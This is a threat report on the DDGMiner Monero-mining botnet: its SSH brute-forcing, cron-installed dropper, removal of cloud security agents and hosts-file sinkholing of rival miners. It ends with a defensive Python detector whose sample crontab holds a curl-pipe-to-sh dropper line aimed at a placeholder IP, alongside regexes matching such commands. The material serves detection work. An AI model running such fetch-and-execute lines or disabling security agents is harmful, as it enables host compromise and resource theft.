The large mining botnet DDGMiner is conducting password brute-force attacks against SSH servers in order to mine Monero on compromised hosts, consuming excessive system resources and disabling some security products.
A security researcher recently detected a weak-password brute-force attack against an SSH server. The attack was launched by the large mining botnet DDGMiner, which scans for and attacks SSH services, Redis databases, OrientDB databases and other exposed servers, then implants a mining Trojan on the compromised host to mine Monero for profit. DDGMiner's primary propagation method is still SSH brute-forcing. After gaining access through weak passwords or an exploit, the attackers first download the shell script i.sh and install it as a crontab entry that runs every 15 minutes. The DDG botnet mainly brute-forces SSH and Redis services to break into Linux systems and mine Monero for profit.

The mining Trojan is under continuous development by the attackers: 9 new versions were released in the past month alone. Once the DDG mining Trojan runs, it requests and downloads a configuration file; according to that configuration it then executes the mining payload, a binary named wordpress, together with the dropper script i.sh. In addition, the latest version of the Trojan downloads the scripts uninstall.sh and quartz_uninstall.sh, which uninstall security protection products such as Tencent Cloud Mirror (Yunjing) and Alibaba Cloud Security Knight (Anqi) to extend the miner's survival time on the server. The mining activity severely degrades server performance.

The Trojan also modifies the hosts file to map the domains of competing miners, such as trumpzwlvlyrvlss.onion, to the IP address 0.0.0.0. Sinkholing rival Trojans' command-and-control names in this way keeps them from running, so the DDG miner alone monopolizes the system's resources. The Monero mining binary wordpress is built from the open-source mining program XMRig.
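The three host-level traces described above (a 15-minute crontab entry that pipes a downloaded script into a shell, 0.0.0.0 sinkhole entries in the hosts file, and a high-CPU miner process named after the XMRig build) are easy to triage offline. The script below is an added example written for this page, not code from the article or from the researchers who analysed DDGMiner; it runs over constructed sample inputs modelled on the article's description (the TEST-NET address 203.0.113.10, the pool name pool.example and the process listing are invented placeholders, not observed indicators). The competitor domain trumpzwlvlyrvlss.onion is the one the article names.

```python
import os
import re
from dataclasses import dataclass
from typing import List

# --- Constructed sample inputs (not captured artifacts) ----------------------
# Output of `crontab -l` on an infected host: one legitimate job plus the
# 15-minute dropper entry described in the article.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/15 * * * * curl -fsSL http://203.0.113.10/i.sh | sh
"""

# Contents of /etc/hosts with competitor domains sinkholed to 0.0.0.0.
SAMPLE_HOSTS = """\
127.0.0.1 localhost
::1 localhost
0.0.0.0 trumpzwlvlyrvlss.onion
0.0.0.0 example-competitor.example   # constructed placeholder
"""

# Output of `ps -eo pid,user,%cpu,args`; the miner runs from /tmp under the
# file name "wordpress" that the article attributes to the XMRig build.
SAMPLE_PS = """\
  PID USER     %CPU COMMAND
  412 root      0.1 /usr/sbin/sshd -D
 7831 root     97.5 /tmp/wordpress -o pool.example:3333
"""

# --- Detection logic ----------------------------------------------------------
CRON_FIELDS = 5
# A cron command that fetches a remote script and feeds it straight into a shell.
PIPE_TO_SH = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
# A cron command that references the dropper script name from the article.
DROPPER_NAME = re.compile(r"(^|[\s/])i\.sh\b")


def suspicious_cron_lines(crontab_text: str) -> List[str]:
    """Return crontab schedule lines whose command looks like a remote dropper."""
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):            # @reboot, @hourly, ... forms
            parts = line.split(None, 1)
            command = parts[1] if len(parts) == 2 else ""
        else:
            parts = line.split(None, CRON_FIELDS)
            if len(parts) <= CRON_FIELDS:   # e.g. MAILTO=... or a malformed line
                continue
            command = parts[CRON_FIELDS]
        if PIPE_TO_SH.search(command) or DROPPER_NAME.search(command):
            findings.append(line)
    return findings


def hosts_sinkholes(hosts_text: str) -> List[str]:
    """Return every hostname that /etc/hosts maps to 0.0.0.0 (a sinkhole)."""
    names = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        fields = line.split()
        if fields[0] == "0.0.0.0":
            names.extend(fields[1:])
    return names


@dataclass
class Proc:
    pid: int
    user: str
    cpu: float
    command: str


MINER_NAMES = {"wordpress", "xmrig"}       # "wordpress" is the name the article gives
POOL_ARGS = re.compile(r"(^|\s)(-o|--url)\s+\S+:\d+")   # xmrig-style pool argument
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def miner_processes(ps_text: str, cpu_threshold: float = 80.0) -> List[Proc]:
    """Flag processes that look like a miner: known name, pool argument, or
    sustained high CPU from a binary living in a world-writable directory."""
    hits = []
    for raw in ps_text.splitlines():
        parts = raw.split(None, 3)
        if len(parts) < 4:
            continue
        pid, user, cpu, command = parts
        try:
            proc = Proc(int(pid), user, float(cpu), command)
        except ValueError:                 # header line or unparsable row
            continue
        exe_path = command.split()[0]
        exe = os.path.basename(exe_path)
        hot_tmp_binary = proc.cpu >= cpu_threshold and exe_path.startswith(TMP_DIRS)
        if exe in MINER_NAMES or POOL_ARGS.search(command) or hot_tmp_binary:
            hits.append(proc)
    return hits


if __name__ == "__main__":
    print("cron:", suspicious_cron_lines(SAMPLE_CRONTAB))
    print("sinkholed:", hosts_sinkholes(SAMPLE_HOSTS))
    print("miners:", [(p.pid, p.command) for p in miner_processes(SAMPLE_PS)])
```

On a live host, feed the functions the real output of `crontab -l` for each user (plus the files under /etc/cron.d), `/etc/hosts`, and `ps -eo pid,user,%cpu,args`. The 0.0.0.0 check is deliberately narrow so that ordinary `127.0.1.1 hostname` entries are not flagged; the process check requires either a known miner name, a pool argument, or high CPU from a binary in /tmp, /var/tmp or /dev/shm, which keeps a busy but legitimate daemon out of the results.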